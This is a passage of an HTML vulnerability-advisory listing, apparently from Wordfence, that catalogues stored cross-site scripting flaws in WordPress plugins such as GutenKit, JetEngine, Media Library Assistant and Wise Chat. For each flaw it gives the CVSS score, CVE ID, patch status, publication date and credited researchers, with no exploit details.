<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/35411f6a-bb1f-4b20-b9ed-66f21c9f7278" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/65b3f4b3-f475-404b-b071-9b08146985db" target="_blank" rel="noopener">GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor &lt; 2.5.0 &#8211; Authenticated (Author+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19697" target="_blank" rel="noopener noreferrer">							CVE-2026-19697						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutenkit-blocks-addon" target="_blank" rel="noopener">GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor</a> <span class="wfvr-software-slug">[gutenkit-blocks-addon]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/04dc25fcada9520afe8fb170e539d8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dc25fcada9520afe8fb170e539d8b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener">Yaswanth Reddy Sunkara</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/65b3f4b3-f475-404b-b071-9b08146985db" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/afcb5fc3-8e53-4a0e-b4b3-26786d2f67d3" target="_blank" rel="noopener">Image Photo Gallery Final Tiles Grid &lt;= 3.6.12 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;delay&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-4559" target="_blank" rel="noopener noreferrer">							CVE-2026-4559						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/final-tiles-grid-gallery-lite" target="_blank" rel="noopener">Image Photo Gallery Final Tiles Grid</a> <span class="wfvr-software-slug">[final-tiles-grid-gallery-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/afcb5fc3-8e53-4a0e-b4b3-26786d2f67d3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d024682b-8bf9-49e1-9891-5e8f77ab5792" target="_blank" rel="noopener">JetEngine &lt; 3.8.14 &#8211; Authenticated (Author+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18202" target="_blank" rel="noopener noreferrer">							CVE-2026-18202						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-engine" target="_blank" rel="noopener">JetEngine</a> <span class="wfvr-software-slug">[jet-engine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d024682b-8bf9-49e1-9891-5e8f77ab5792" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5cbdcfd4-8bab-4b2a-aaae-59e50c7e02a8" target="_blank" rel="noopener">Login With Ajax – Fast Logins, 2FA, Redirects &lt;= 4.5.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66640" target="_blank" rel="noopener noreferrer">							CVE-2026-66640						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/login-with-ajax" target="_blank" rel="noopener">Login With Ajax – Fast Logins, 2FA, Redirects</a> <span class="wfvr-software-slug">[login-with-ajax]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5cbdcfd4-8bab-4b2a-aaae-59e50c7e02a8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b274b118-cf2d-4b03-b39a-fa2806d3bd8a" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates &lt; 2.3.3 &#8211; Authenticated (Custom Role+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19712" target="_blank" rel="noopener noreferrer">							CVE-2026-19712						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learning-management-system" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates</a> <span class="wfvr-software-slug">[learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0da320f0ff233e1fc5948be78c4a9693.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0da320f0ff233e1fc5948be78c4a9693"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov" target="_blank" rel="noopener">Farid Narimanov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b274b118-cf2d-4b03-b39a-fa2806d3bd8a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/641b739d-f888-4327-b1c5-c95de39ee011" target="_blank" rel="noopener">MC4WP: Mailchimp for WordPress &lt;= 4.12.0 &#8211; Authenticated (Author+) Stored Cross-Site Scripting via Form Response Messages</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-4561" target="_blank" rel="noopener noreferrer">							CVE-2026-4561						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailchimp-for-wp" target="_blank" rel="noopener">MC4WP: Mailchimp for WordPress</a> <span class="wfvr-software-slug">[mailchimp-for-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/641b739d-f888-4327-b1c5-c95de39ee011" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d2885b38-9e5a-4e06-ad1d-9c3b266f78a8" target="_blank" rel="noopener">Media Library Assistant &lt;= 3.39 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66591" target="_blank" rel="noopener noreferrer">							CVE-2026-66591						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/media-library-assistant" target="_blank" rel="noopener">Media Library Assistant</a> <span class="wfvr-software-slug">[media-library-assistant]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4f2a3b32ba525d9a6cd33a222b91f5ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f2a3b32ba525d9a6cd33a222b91f5ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener">Abdullah Kareem &#8220;cyberkareem&#8221;</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d2885b38-9e5a-4e06-ad1d-9c3b266f78a8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d87133a0-d24a-4c6a-8d6b-3867a319796a" target="_blank" rel="noopener">Media Library Assistant &lt;= 3.39 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66601" target="_blank" rel="noopener noreferrer">							CVE-2026-66601						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/media-library-assistant" target="_blank" rel="noopener">Media Library Assistant</a> <span class="wfvr-software-slug">[media-library-assistant]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4498ddf94b5463ecd8bdfd24592da6a4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4498ddf94b5463ecd8bdfd24592da6a4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener">nh4tvd</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d87133a0-d24a-4c6a-8d6b-3867a319796a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2626ad96-4346-4564-b6bd-0c226bd8dfd4" target="_blank" rel="noopener">Speed Optimizer &lt;= 7.8.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Image Tag Attributes</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15421" target="_blank" rel="noopener noreferrer">							CVE-2026-15421						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sg-cachepress" target="_blank" rel="noopener">Speed Optimizer – The All-In-One Performance-Boosting Plugin</a> <span class="wfvr-software-slug">[sg-cachepress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/stealthcopter" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f894d5600bcba5e947d6dde37a3cec1b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f894d5600bcba5e947d6dde37a3cec1b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/stealthcopter" target="_blank" rel="noopener">stealthcopter</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2626ad96-4346-4564-b6bd-0c226bd8dfd4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49053035-5c39-430f-8b4c-b6fae3dcc502" target="_blank" rel="noopener">Table Of Contents Block &lt;= 1.5.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66645" target="_blank" rel="noopener noreferrer">							CVE-2026-66645						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/table-of-contents-block" target="_blank" rel="noopener">Table Of Contents Block</a> <span class="wfvr-software-slug">[table-of-contents-block]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49053035-5c39-430f-8b4c-b6fae3dcc502" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6501410e-8625-43ad-8ad5-57944aad052d" target="_blank" rel="noopener">Typing Effect &lt;= 1.3.7 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66644" target="_blank" rel="noopener noreferrer">							CVE-2026-66644						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/animated-typing-effect" target="_blank" rel="noopener">Typing Effect</a> <span class="wfvr-software-slug">[animated-typing-effect]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6501410e-8625-43ad-8ad5-57944aad052d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d9172789-8527-4862-a93d-6e89bf599424" target="_blank" rel="noopener">Video Conferencing with Zoom &lt;= 4.6.8 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66641" target="_blank" rel="noopener noreferrer">							CVE-2026-66641						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/video-conferencing-with-zoom-api" target="_blank" rel="noopener">Video Conferencing with Zoom</a> <span class="wfvr-software-slug">[video-conferencing-with-zoom-api]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d9172789-8527-4862-a93d-6e89bf599424" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1379bd6a-529e-42b9-bc01-8373b314c771" target="_blank" rel="noopener">Wise Chat &lt;= 3.4 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66636" target="_blank" rel="noopener noreferrer">							CVE-2026-66636						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wise-chat" target="_blank" rel="noopener">Wise Chat</a> <span class="wfvr-software-slug">[wise-chat]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1379bd6a-529e-42b9-bc01-8373b314c771" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9536e78e-f9c9-444f-9fae-0ffa24590c5a" target="_blank" rel="noopener">WP BASE Booking of Appointments, Services and Events &lt;= 6.3.2 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
